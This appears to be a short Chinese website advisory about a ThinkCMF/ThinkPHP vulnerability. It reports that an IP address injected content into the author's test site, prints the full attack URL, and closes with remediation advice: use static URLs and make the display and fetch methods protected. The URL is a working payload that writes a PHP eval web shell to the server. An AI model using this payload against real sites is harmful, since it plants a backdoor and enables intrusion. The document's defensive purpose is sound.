更新日期:2020-09-05 08:45:34
来源:互联网
浏览量:119
最近网站有一个ip地址是106.110.10.202往我的一个测试站注入内容,所以使用thinkphp的要注意了。小心写入不该写入的内容。
106.110.10.202 ip 请求写后门 ThinkCMF漏洞要小心
url代码为:
http://域名/index.php?a=fetch&templateFile=public/index&prefix=%27%27&content=<php>file_put_contents(%27vmi5fs.php%27,%27OK<?php%20@eval($_POST[%27q91%27]);?>%27)</php>
遇到这样的问题,你可能会想漏洞修复就完了呗,或者删除掉对应的代码就好了,其实你只是治标并不治本。回头还会有第二次、
第三次出问题。
那么遇见这类的问题怎么处理呢?
如果你的网站url是动态访问的,那么你的网站就有可能找到漏洞,被一些别有用心的人给利用了。即使是BAT也避免不了。
第一步是要采取静态或伪静态。
第二步,就是有漏洞修复漏洞。
漏洞修复建议
将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected
提示:想了解更多106.110.10.202 ip 请求写后门 ThinkCMF漏洞要小心相关的内容,请尝试通过上方搜索框搜索。